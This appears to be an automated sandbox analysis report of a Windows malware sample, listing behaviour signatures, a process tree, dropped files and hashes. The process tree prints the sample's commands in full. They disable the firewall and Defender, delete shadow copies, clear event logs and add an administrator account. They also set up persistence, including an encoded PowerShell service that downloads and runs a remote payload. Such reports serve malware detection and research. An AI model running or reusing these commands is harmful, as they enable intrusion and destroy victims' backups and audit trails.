Analysis

  • max time kernel
    53s
  • max time network
    55s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250502-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250502-enlocale:en-usos:windows10-2004-x64system
  • submitted
    03/05/2025, 15:32

General

  • Target

    QueQtcK18.exe

  • Size

    7.0MB

  • MD5

    888de6f60367d5612ecddc1dd96229e1

  • SHA1

    b888334a1b9caf8292966a8ac6aceffccb0f7045

  • SHA256

    11e9d14bbff708d791c36da8ba71aa4eda882b56a85cd439cfbe98bf700cd9d3

  • SHA512

    989047011fc3714d707e058faad9aceb0093eba6c3828e468d4ae51f8c25b458a189187c7ef69c5d2384d93cd3b3eb80fd80cd32e6e11876c3df5f8140c1518c

  • SSDEEP

    98304:77BUGQ0nuaZ1j+LbCuZhCMYkcIt5FkOwSrIcUsLXRL2wbLp8FPg6XwKKmF:7VFuo1SPCurH/P/XRL4P2KKmF

Malware Config

Signatures

  • Clears Windows event logs 1 TTPs 3 IoCs
  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 11 IoCs

    Using powershell.exe command.

  • Creates new service(s) 2 TTPs
  • Loads dropped DLL 6 IoCs
  • Drops file in System32 directory 1 IoCs
  • Launches sc.exe 6 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Permission Groups Discovery: Local Groups 1 TTPs

    Attempt to find local system groups and permission settings.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Modifies data under HKEY_USERS 41 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 31 IoCs
  • Suspicious use of AdjustPrivilegeToken 62 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\QueQtcK18.exe
    "C:\Users\Admin\AppData\Local\Temp\QueQtcK18.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:812
    • C:\Users\Admin\AppData\Local\Temp\QueQtcK18.exe
      "C:\Users\Admin\AppData\Local\Temp\QueQtcK18.exe"
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:4664
      • C:\Windows\SYSTEM32\schtasks.exe
        schtasks /create /tn MyPythonScript /tr "\"C:\Users\Admin\AppData\Local\Temp\QueQtcK18.exe\" \"C:\Users\Admin\AppData\Local\Temp\_MEI8122\QueQtcK18.py\"" /sc onstart /f
        3⤵
        • Scheduled Task/Job: Scheduled Task
        PID:212
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command "Set-NetFirewallProfile -Enabled False"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2708
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "sc create OneLogon18 binPath= "C:\Windows\System32\svchost.exe" start= auto"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3064
        • C:\Windows\system32\sc.exe
          sc create OneLogon18 binPath= "C:\Windows\System32\svchost.exe" start= auto
          4⤵
          • Launches sc.exe
          PID:4708
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "sc start OneLogon18"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3996
        • C:\Windows\system32\sc.exe
          sc start OneLogon18
          4⤵
          • Launches sc.exe
          PID:1208
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "sc create MaliciousService binPath= "C:\Windows\System32\svchost.exe" start= auto"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2132
        • C:\Windows\system32\sc.exe
          sc create MaliciousService binPath= "C:\Windows\System32\svchost.exe" start= auto
          4⤵
          • Launches sc.exe
          PID:2192
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "sc start MaliciousService"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1312
        • C:\Windows\system32\sc.exe
          sc start MaliciousService
          4⤵
          • Launches sc.exe
          PID:3396
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command "Get-WmiObject Win32_ShadowCopy | ForEach-Object { $_.Delete() }"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2344
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command "wevtutil cl Application"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1592
        • C:\Windows\system32\wevtutil.exe
          "C:\Windows\system32\wevtutil.exe" cl Application
          4⤵
          • Clears Windows event logs
          • Suspicious use of AdjustPrivilegeToken
          PID:2036
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command "wevtutil cl System"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3472
        • C:\Windows\system32\wevtutil.exe
          "C:\Windows\system32\wevtutil.exe" cl System
          4⤵
          • Clears Windows event logs
          • Suspicious use of AdjustPrivilegeToken
          PID:2968
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command "wevtutil cl Security"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:436
        • C:\Windows\system32\wevtutil.exe
          "C:\Windows\system32\wevtutil.exe" cl Security
          4⤵
          • Clears Windows event logs
          • Suspicious use of AdjustPrivilegeToken
          PID:2176
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "sc create MalwareService binPath= "powershell.exe -nop -w hidden -enc JElQID0gImh0dHA6Ly9leGFtcGxlLmNvbS9wYXlsb2FkLmV4ZSI7IEludm9rZS1XZWJSZXF1ZXN0ICRJUCAtT3V0RmlsZSAiQzpcXHRlbXBcXHBheWxvYWQuZXhlIjsgU3RhcnQtUHJvY2VzcyAiQzpcXHRlbXBcXHBheWxvYWQuZXhlIg==" start= auto"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:868
        • C:\Windows\system32\sc.exe
          sc create MalwareService binPath= "powershell.exe -nop -w hidden -enc JElQID0gImh0dHA6Ly9leGFtcGxlLmNvbS9wYXlsb2FkLmV4ZSI7IEludm9rZS1XZWJSZXF1ZXN0ICRJUCAtT3V0RmlsZSAiQzpcXHRlbXBcXHBheWxvYWQuZXhlIjsgU3RhcnQtUHJvY2VzcyAiQzpcXHRlbXBcXHBheWxvYWQuZXhlIg==" start= auto
          4⤵
          • Launches sc.exe
          PID:8
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "sc start MalwareService"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2952
        • C:\Windows\system32\sc.exe
          sc start MalwareService
          4⤵
          • Launches sc.exe
          PID:2716
      • C:\Windows\SYSTEM32\cmd.exe
        cmd.exe
        3⤵
          PID:1064
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command "schtasks /create /tn \"MaliciousTask\" /tr \"cmd.exe /c calc\" /sc daily /st 00:00"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2132
          • C:\Windows\system32\schtasks.exe
            "C:\Windows\system32\schtasks.exe" /create /tn MaliciousTask /tr "cmd.exe /c calc" /sc daily /st 00:00
            4⤵
            • Scheduled Task/Job: Scheduled Task
            PID:4736
        • C:\Windows\SYSTEM32\ping.exe
          ping malicious-host.com
          3⤵
          • System Network Configuration Discovery: Internet Connection Discovery
          • Runs ping.exe
          PID:3176
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3992
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command "Set-NetFirewallProfile -Enabled False"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4012
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command "net user OneLogonFintUser password1234 /add"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3104
          • C:\Windows\system32\net.exe
            "C:\Windows\system32\net.exe" user OneLogonFintUser password1234 /add
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:3252
            • C:\Windows\system32\net1.exe
              C:\Windows\system32\net1 user OneLogonFintUser password1234 /add
              5⤵
                PID:2976
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -Command "net localgroup Administrators OneLogonFintUser /add"
            3⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2232
            • C:\Windows\system32\net.exe
              "C:\Windows\system32\net.exe" localgroup Administrators OneLogonFintUser /add
              4⤵
                PID:1656
                • C:\Windows\system32\net1.exe
                  C:\Windows\system32\net1 localgroup Administrators OneLogonFintUser /add
                  5⤵
                    PID:4752
          • C:\Windows\System32\svchost.exe
            C:\Windows\System32\svchost.exe
            1⤵
              PID:1644
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe
              1⤵
                PID:3856
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell.exe -nop -w hidden -enc JElQID0gImh0dHA6Ly9leGFtcGxlLmNvbS9wYXlsb2FkLmV4ZSI7IEludm9rZS1XZWJSZXF1ZXN0ICRJUCAtT3V0RmlsZSAiQzpcXHRlbXBcXHBheWxvYWQuZXhlIjsgU3RhcnQtUHJvY2VzcyAiQzpcXHRlbXBcXHBheWxvYWQuZXhlIg==
                1⤵
                • Command and Scripting Interpreter: PowerShell
                • Drops file in System32 directory
                • Modifies data under HKEY_USERS
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:4008
              • C:\Windows\system32\vssvc.exe
                C:\Windows\system32\vssvc.exe
                1⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:2188

              Network

                    MITRE ATT&CK Enterprise v16

                    Replay Monitor

                    Loading Replay Monitor...

                    Downloads

                    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                      Filesize

                      2KB

                      MD5

                      d85ba6ff808d9e5444a4b369f5bc2730

                      SHA1

                      31aa9d96590fff6981b315e0b391b575e4c0804a

                      SHA256

                      84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                      SHA512

                      8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                      Filesize

                      1KB

                      MD5

                      b8f5272f1a630c61556ae3d396dc0a9a

                      SHA1

                      0fc3e0db215cdc31b8fb96caa989196916ee16eb

                      SHA256

                      ef48366dbf9c8815c000644531758f59d72258dc8aabbbc2531265948e4656e2

                      SHA512

                      07019777583138794ba2936e893e76acebba19841d41127da9ee6737843d385db1183639f468f5a582126cd325b7731afd230dfe55cbdcde31f8de26aa6c3be7

                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                      Filesize

                      64B

                      MD5

                      a236b3d32301a8a69eb1facaee013c2c

                      SHA1

                      e2797d2111ad7f584b538af1e8483c789b42c049

                      SHA256

                      d539da2916ee368cf9ad8455f0e3705300fd9fa5f30e78b3c6e8f7821e778b22

                      SHA512

                      c92ac75c33e501f4c95046e46175788574e2b4d159cb1158b8102d9f4c6b7e269e7df2fca4f43d60a68a35fbcd7b5e3b68ba44839320e5f801d9285ac83568a5

                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                      Filesize

                      64B

                      MD5

                      534b7ac514f09b0ddb01d2c941131956

                      SHA1

                      8b981b197a789efd757fc7c964e8d7c151327138

                      SHA256

                      ee5bdd4f5ff596a1dfec7e7abf31bed719b357d7f4eac10943b28ec5695a54f3

                      SHA512

                      38067e3c8ec2231160a53f80b1398ff0c16edff6e3dc20dbb8b9082dc836958ddee08e06734287a6c5f2f537572bee69e9c7324a83a823791da596589467446e

                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                      Filesize

                      944B

                      MD5

                      a10f29bd142d27667e3de4927bca93a2

                      SHA1

                      f009910db810d3826add6fdbc5d2d06d30ab200d

                      SHA256

                      6e37cf30b9188d04d5c2e5b9583a1cda02da6c86d4bd03c34c5cc80e6e8642f2

                      SHA512

                      e2c93a19888bd000e9ad79a43ede8e77493a56db21ed19d385e2cd6e6da9d3edf34e5a83c49467d28d7a7ee89d90cdb30a2cc1c6dfd9b22d68c8bb356e8f79fa

                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                      Filesize

                      1KB

                      MD5

                      f5a3c413511d951793530df77a555858

                      SHA1

                      dc964e9ca86626b19b8047ab7a0af53d17a22f50

                      SHA256

                      19664a8c1db4cd0215b35b6ca3983edb1e6e29b1f1720738d59fccb70c20cc56

                      SHA512

                      61d9fb66854c1e506ece46ea79ec0bbba2caddb0a996f310ee1475877ce967e198ef453b0a0760d76ff4c67438db5f67c6ee18873f90f23f3926847ce8aba059

                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                      Filesize

                      64B

                      MD5

                      46f70064042d4347f3408c31a877c4f5

                      SHA1

                      064ae10b4fc2318ea9666a2d6004f3836d0dad8d

                      SHA256

                      e0fbe1727af5d6db4096e8c8a48b7c8ccb4865551c19522baa75fbf3cf95b29d

                      SHA512

                      24882f6d5bc757b1893c0c1d82307df92e07e8bd2d4ab08ccd404c99abb2f308c42e8004f70fb895f8d109e9dbc890ccbbf7a5059f8d70ee6f1787aad8473ade

                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                      Filesize

                      64B

                      MD5

                      f08bb5e6f49788531694ac01cd9df894

                      SHA1

                      81edea4b2997856fedc7e27efa12837926c3924b

                      SHA256

                      24cb30bab5b03b374a25961abc5bb1f150be147e0922095997d761a9923e6606

                      SHA512

                      2ab3d93f6a49bb67408e9f981742becd964338db13c54d6281318b383230d94d814a71bdb7a00c72c6233170ef4a9332a4e1aa633db44f21dfdcbb7578d31717

                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                      Filesize

                      64B

                      MD5

                      b4c38c85d25f548e6bd2d16b79177c13

                      SHA1

                      7e22f257ab42981633783d1a8088b8837472a86f

                      SHA256

                      feae36b7f9aeec516032dde1ffecf764622247dce7596d23449525887c52d532

                      SHA512

                      dd74eab8d4b141921dfdcbbbb1a6df40c62c7aaa22b63d96bf9db4f3e851a635c77011b0c008b66daf277d93aea6a8678eff6bb939e83f3588e4b63d91ac1454

                    • C:\Users\Admin\AppData\Local\Temp\_MEI8122\VCRUNTIME140.dll

                      Filesize

                      117KB

                      MD5

                      32da96115c9d783a0769312c0482a62d

                      SHA1

                      2ea840a5faa87a2fe8d7e5cb4367f2418077d66b

                      SHA256

                      052ad6a20d375957e82aa6a3c441ea548d89be0981516ca7eb306e063d5027f4

                      SHA512

                      616c78b4a24761d4640ae2377b873f7779322ef7bc26f8de7da0d880b227c577ed6f5ed794fc733468477b2fcdb7916def250e5dc63e79257616f99768419087

                    • C:\Users\Admin\AppData\Local\Temp\_MEI8122\_bz2.pyd

                      Filesize

                      83KB

                      MD5

                      684d656aada9f7d74f5a5bdcf16d0edb

                      SHA1

                      f7586da90d101b5ee3fa24f131ee93ab89606919

                      SHA256

                      449058efc99fccb9e24d640084d845c78f3f86dd34c5c126cf69e523d6320d75

                      SHA512

                      27fb2eca382675316fb96d18a1aa6b2792077481bf899cbcc658d71f787876045c05c98abf129c9670b6a1d2654d57f59e17580139fa7f482ec27234e44d4235

                    • C:\Users\Admin\AppData\Local\Temp\_MEI8122\_ctypes.pyd

                      Filesize

                      130KB

                      MD5

                      29873384e13b0a78ee9857604161514b

                      SHA1

                      110f60f74b06b3972acd5908937a40e078636479

                      SHA256

                      5c0d5082fba1a2a3eb8d5e23073be25164c19f21304b09cecaab340dc7198815

                      SHA512

                      ca826ff5403700e6d8822634e364e43b14ef829095d8fe365b49731236f696fe86ffa3853cd1801dc3b7800d005a032fe23bbc25befe3952ef37790d56dee3c5

                    • C:\Users\Admin\AppData\Local\Temp\_MEI8122\_decimal.pyd

                      Filesize

                      273KB

                      MD5

                      21fcb8e3d4310346a5dc1a216e7e23ca

                      SHA1

                      aab11aef9075715733e0fcde9668c6a51654b9e1

                      SHA256

                      4e27c06b84401039d10f800a0f06446b58508784ee366c7c8324d8fe9794e1a5

                      SHA512

                      c064550d1723e92512a42ce367ecef9331a81121305d66199abce6e0977152d927f7223f475e22c67e3f64b0f612c5553f112d8ce653c666a98d1980d200a599

                    • C:\Users\Admin\AppData\Local\Temp\_MEI8122\_hashlib.pyd

                      Filesize

                      63KB

                      MD5

                      3e540ef568215561590df215801b0f59

                      SHA1

                      3b6db31a97115c10c33266cce8ff80463763c7e6

                      SHA256

                      52f29aebe9886e830dedc363cd64eb53b6830d84b26e14f1b6faa655a0900b5d

                      SHA512

                      21497a4d1d999a420ed0e146544f4149c72ad4aca4b869a0ee83267d92afa07609ece76a4e95ec706a21580d6544146d0a58c0baa01aa2c242474a4816108527

                    • C:\Users\Admin\AppData\Local\Temp\_MEI8122\_lzma.pyd

                      Filesize

                      155KB

                      MD5

                      d63e2e743ea103626d33b3c1d882f419

                      SHA1

                      af8a162b43f99b943d1c87c9a9e8088816263373

                      SHA256

                      48f16b587c6faa44a9e073365b19599200b0f0a0ccb70121e76c2dac4ed53281

                      SHA512

                      d3f1450b5def3c21f47c5133073e76d2ec05787eb6ae88bb70d3a34be84f6025540ac017e9415bb22ef36c2ffbfcea38a28842eefe366325f3d3cf2cca1a3cb1

                    • C:\Users\Admin\AppData\Local\Temp\_MEI8122\_socket.pyd

                      Filesize

                      83KB

                      MD5

                      566cb4d39b700c19dbd7175bd4f2b649

                      SHA1

                      bede896259b6d52d538c2182aef87c334fc9c73c

                      SHA256

                      bced17d6f081d81ea7cd92f1e071e38f8840e61ee0fe1524221b776bcfa78650

                      SHA512

                      6a26fd59e2c2ec34b673ef257a00d5577f52286d78525d05efc8a88760fb575be65c3e94e83396f4978c8734b513afe7f09d3c49474169144f98add406530367

                    • C:\Users\Admin\AppData\Local\Temp\_MEI8122\base_library.zip

                      Filesize

                      1.3MB

                      MD5

                      c8908f8b995911d4fa3d8d5182b68c77

                      SHA1

                      33410826118610a65a535701cf6ca548a33e8d4f

                      SHA256

                      cd1bd1b1795fa06d01e54be54ce5f12d0c7f8795254e79bbe49f5d071d53d254

                      SHA512

                      e0dd014e07fe26e740f14f8be6a4acb30e782207f68d097bb30fb1a8f67dffa3997826184555fb90160be8fa6243741639ef6d14b46256a6dcd449af34db5695

                    • C:\Users\Admin\AppData\Local\Temp\_MEI8122\libcrypto-3.dll

                      Filesize

                      5.0MB

                      MD5

                      ae5b2e9a3410839b31938f24b6fc5cd8

                      SHA1

                      9f9a14efc15c904f408a0d364d55a144427e4949

                      SHA256

                      ccfffddcd3defb8d899026298af9af43bc186130f8483d77e97c93233d5f27d7

                      SHA512

                      36ea760a7b56ea74174882155eddfb8726828240fcfc6b34d90ecdb7e50a7e632374dcbc9b2889081c0973cc51f50967e7d692498c4abd1f2cba3f7fe8d659cc

                    • C:\Users\Admin\AppData\Local\Temp\_MEI8122\libffi-8.dll

                      Filesize

                      38KB

                      MD5

                      0f8e4992ca92baaf54cc0b43aaccce21

                      SHA1

                      c7300975df267b1d6adcbac0ac93fd7b1ab49bd2

                      SHA256

                      eff52743773eb550fcc6ce3efc37c85724502233b6b002a35496d828bd7b280a

                      SHA512

                      6e1b223462dc124279bfca74fd2c66fe18b368ffbca540c84e82e0f5bcbea0e10cc243975574fa95ace437b9d8b03a446ed5ee0c9b1b094147cefaf704dfe978

                    • C:\Users\Admin\AppData\Local\Temp\_MEI8122\python313.dll

                      Filesize

                      5.8MB

                      MD5

                      7387fe038ea75eb9a57b054fccfe37bf

                      SHA1

                      5c532cbdfd718b5e80afb2ee8dea991e84757712

                      SHA256

                      69fd86ea29370697c203f7e12830084f920f490766a8e3045af52c036a9ad529

                      SHA512

                      c46c982b04079ed0b13617b81168598632d6c58d29e23fcbfa064b08e5836866b74880e1a9c01c12670531f13521a21177aafb10be0abb329a79291d7bff08bd

                    • C:\Users\Admin\AppData\Local\Temp\_MEI8122\select.pyd

                      Filesize

                      31KB

                      MD5

                      715a098175d3ca1c1da2dc5756b31860

                      SHA1

                      6b3ec06d679c48bfe4391535a822b58a02d79026

                      SHA256

                      6393121130a3e85d0f6562948024d8614c4c144b84ab102af711c638344d1599

                      SHA512

                      e92edb98427f594badec592493469d45deab3b71e4598d544d0b9a1acffd5327a19c09029fb79d70971cb0ed0dba56056bef8455534d3f16ec35eac723062f3c

                    • C:\Users\Admin\AppData\Local\Temp\_MEI8122\unicodedata.pyd

                      Filesize

                      695KB

                      MD5

                      503b3ffa6a5bf45ab34d6d74352f206b

                      SHA1

                      cc13b85281e5d52413784e0b65a61b1d037c60cc

                      SHA256

                      071494856fdad0042964769aa2fb1de4ea95c2cfcbe27cc7132293c68d13d710

                      SHA512

                      d20b860974161caa60a62268968af353ad8063589f57d71f57c91855eb83da78f40bae7aa745cc7a945d92ebe08cf244c9560ae93449de45b20a8b8fff9f5010

                    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_etxojzvw.wfe.ps1

                      Filesize

                      60B

                      MD5

                      d17fe0a3f47be24a6453e9ef58c94641

                      SHA1

                      6ab83620379fc69f80c0242105ddffd7d98d5d9d

                      SHA256

                      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                      SHA512

                      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                    • C:\temp\malicious_files\malicious_file_4.txt

                      Filesize

                      47B

                      MD5

                      36c27a04d9c0cda5d1452f91570d96d8

                      SHA1

                      715dcb03713dc380e3e35387ccd2ad9138e6cdbf

                      SHA256

                      4a93ff4f6f5c2689e0e299ccd4f1df5e9b5bed90b79b7cf9c3d048d48664b439

                      SHA512

                      111c383637e37c865d2f21e829d11b44a723eb131155fcee8cbaadd8b2cffe35c3cb90ac60f6107158518831f1d84f8da166fabe45891b5bbe459f65c31a0235

                    • memory/2708-32-0x00007FFD1CC33000-0x00007FFD1CC35000-memory.dmp

                      Filesize

                      8KB

                    • memory/2708-38-0x000001C218DE0000-0x000001C218E02000-memory.dmp

                      Filesize

                      136KB

                    • memory/2708-1104-0x00007FFD1CC30000-0x00007FFD1D6F1000-memory.dmp

                      Filesize

                      10.8MB

                    • memory/2708-46-0x000001C230F80000-0x000001C230F9A000-memory.dmp

                      Filesize

                      104KB

                    • memory/2708-45-0x000001C230F50000-0x000001C230F5E000-memory.dmp

                      Filesize

                      56KB

                    • memory/2708-44-0x00007FFD1CC30000-0x00007FFD1D6F1000-memory.dmp

                      Filesize

                      10.8MB

                    • memory/2708-43-0x00007FFD1CC30000-0x00007FFD1D6F1000-memory.dmp

                      Filesize

                      10.8MB